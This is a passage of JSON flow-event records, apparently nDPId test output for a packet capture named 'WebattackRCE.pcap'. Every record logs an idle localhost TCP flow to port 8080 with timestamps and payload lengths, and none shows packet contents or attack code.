-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 